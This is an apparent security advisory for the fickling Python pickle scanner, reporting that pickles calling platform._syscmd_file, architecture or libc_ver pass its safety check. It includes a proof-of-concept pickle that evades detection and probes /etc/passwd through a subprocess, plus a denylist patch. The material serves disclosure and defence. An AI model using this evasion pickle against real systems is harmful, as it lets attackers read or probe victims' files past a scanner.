PT-2026-27286 · Pypi · Fickling

Published: 2026-03-13 · Updated: 2026-03-13

CVSS v4.0: 6.9 (Medium)

Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

Our assessment

It was not possible to inject extra arguments to file without first monkey-patching platform._follow_symlinks with the pickle, as it always returns an absolute path. We independently hardened it with https://github.com/trailofbits/fickling/commit/b9e690c5a57ee9cd341de947fc6151959f4ae359 to reduce the risk of obtaining direct module references while evading detection.
```python
# Excerpt from platform._syscmd_file() in the CPython standard library
target = _follow_symlinks(target)
# "file" output is locale dependent: force the usage of the C locale
# to get deterministic behavior.
env = dict(os.environ, LC_ALL='C')
try:
    # -b: do not prepend filenames to output lines (brief mode)
    output = subprocess.check_output(['file', '-b', target],
                                     stderr=subprocess.DEVNULL,
                                     env=env)
```

Original report

Summary

A crafted pickle invoking platform._syscmd_file, platform.architecture, or platform.libc_ver passes check_safety() with Severity.LIKELY_SAFE and zero findings. During fickling.loads(), these functions invoke subprocess.check_output with attacker-controlled arguments or read arbitrary files from disk.
Clarification: The subprocess call uses a list argument (['file', '-b', target]), not shell=True, so the attacker controls the file path argument to the file command, not the command itself. The impact is subprocess invocation with attacker-controlled arguments and information disclosure (file type probing), not arbitrary command injection.

Affected versions

<= 0.1.9 (verified on upstream HEAD as of 2026-03-04)

Non-duplication check against published Fickling GHSAs

No published advisory covers platform module false-negative bypass. This follows the same structural pattern as GHSA-5hwf-rc88-82xm (missing modules in UNSAFE_IMPORTS) but covers a distinct set of functions.

Root cause

  1. platform not in UNSAFE_IMPORTS denylist.
  2. OvertlyBadEvals skips calls imported from stdlib modules.
  3. UnusedVariables heuristic neutralized by making call result appear used (SETITEMS path).
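
As an added illustration of the first root cause (not fickling's code and not part of the original report), the scanner below lists the globals a pickle would import using only `pickletools`, then compares a denylist that lacks `platform` with an allowlist. `DENY`, `ALLOW`, the function names and the sample bytes are constructed for this example; the pickle is scanned, never loaded.

```python
import pickletools

STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

def imported_globals(data: bytes) -> list:
    """List the (module, name) pairs a pickle would import, without loading it."""
    found, prev = [], []  # prev: (opcode name, arg) of earlier ops, MEMOIZE skipped
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":            # protocols 0-3: arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":    # protocol 4+: module and name come off the stack
            last = prev[-2:]
            if len(last) == 2 and all(name in STRING_OPS for name, _ in last):
                found.append((last[0][1], last[1][1]))
            else:
                found.append((None, None))  # origin not resolvable: fail closed
        if op.name != "MEMOIZE":           # MEMOIZE does not change the stack
            prev.append((op.name, arg))
    return found

def denylist_flags(data: bytes, deny_modules: set) -> list:
    """Denylist policy: flag only imports whose top-level module is listed."""
    return [g for g in imported_globals(data)
            if g[0] is None or g[0].split(".")[0] in deny_modules]

def allowlist_flags(data: bytes, allowed: set) -> list:
    """Allowlist policy: flag every import that was not explicitly approved."""
    return [g for g in imported_globals(data) if g not in allowed]

def _sbu(text: str) -> bytes:
    """Encode a SHORT_BINUNICODE opcode (one-byte length prefix)."""
    raw = text.encode()
    return b"\x8c" + bytes([len(raw)]) + raw

# Constructed sample: the import/call sequence from the page's reproduction
# (PROTO 4, STACK_GLOBAL, TUPLE1, REDUCE, STOP). It is scanned, never loaded.
SAMPLE = (b"\x80\x04" + _sbu("platform") + _sbu("_syscmd_file") + b"\x93"
          + _sbu("/etc/passwd") + b"\x85R.")
DENY = {"os", "subprocess", "builtins"}    # constructed; not fickling's UNSAFE_IMPORTS
ALLOW = {("collections", "OrderedDict")}   # constructed application allowlist

if __name__ == "__main__":
    print("imports:        ", imported_globals(SAMPLE))
    print("denylist flags: ", denylist_flags(SAMPLE, DENY))
    print("allowlist flags:", allowlist_flags(SAMPLE, ALLOW))
```

The STACK_GLOBAL resolution is a heuristic over adjacent string pushes; anything it cannot resolve is reported as `(None, None)` and flagged under both policies.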

Reproduction (clean upstream)

```python
from unittest.mock import patch
import fickling
import fickling.fickle as op
from fickling.fickle import Pickled
from fickling.analysis import check_safety

pickled = Pickled([
    op.Proto.create(4),
    # Import platform._syscmd_file and call it with one argument
    op.ShortBinUnicode('platform'),
    op.ShortBinUnicode('_syscmd_file'),
    op.StackGlobal(),
    op.ShortBinUnicode('/etc/passwd'),
    op.TupleOne(),
    op.Reduce(),
    op.Memoize(),
    # Store the call result in a dict so it appears used (SETITEMS path)
    op.EmptyDict(),
    op.ShortBinUnicode('init'),
    op.ShortBinUnicode('x'),
    op.SetItem(),
    op.Mark(),
    op.ShortBinUnicode('trace'),
    op.BinGet(0),
    op.SetItems(),
    op.Stop(),
])

results = check_safety(pickled)
print(results.severity.name, len(results.results))  # LIKELY_SAFE 0

# subprocess.check_output is mocked, so no real subprocess is started
with patch('subprocess.check_output', return_value=b'ASCII text') as mock_sub:
    fickling.loads(pickled.dumps())
    print('subprocess called?', mock_sub.called)  # True
    print('args:', mock_sub.call_args[0])         # (['file', '-b', '/etc/passwd'],)
```

Additional affected functions (same pattern):
  • platform.architecture('/etc/passwd') — calls _syscmd_file internally
  • platform.libc_ver('/etc/passwd') — opens and reads arbitrary file contents

Minimal patch diff

diff
--- a/fickling/fickle.py
+++ b/fickling/fickle.py
@@
+    "platform",
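
Review bot: The bare @@ header carries no line range or context lines, so the hunk does not show which list in fickling/fickle.py the "platform", entry joins; regenerate the diff with context so a reader can confirm it lands in the imports denylist named under Root cause. The entry also addresses only the first of the three root causes listed above: the OvertlyBadEvals stdlib skip and the SETITEMS path around UnusedVariables are unchanged, so another stdlib module missing from the list would still receive the same verdict. A regression test asserting the reproduction's new verdict, and that the subprocess call is not made, would belong in the same change.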

Validation after patch

  • Same PoC flips to LIKELY_OVERTLY_MALICIOUS
  • fickling.loads raises UnsafeFileError
  • subprocess.check_output is not called

Impact

  • False-negative verdict: check_safety() returns LIKELY_SAFE with zero findings for a pickle that invokes a subprocess with attacker-controlled arguments.
  • Subprocess invocation: platform._syscmd_file calls subprocess.check_output(['file', '-b', target]) where target is attacker-controlled. The file command reads file headers and returns type information, enabling file existence and type probing.
  • File read: platform.libc_ver opens and reads chunks of an attacker-specified file path.

Fix

Incomplete List of Disallowed Inputs


Weakness Enumeration

Related Identifiers

GHSA-5CXW-W2XG-2M8H

Affected Products

Fickling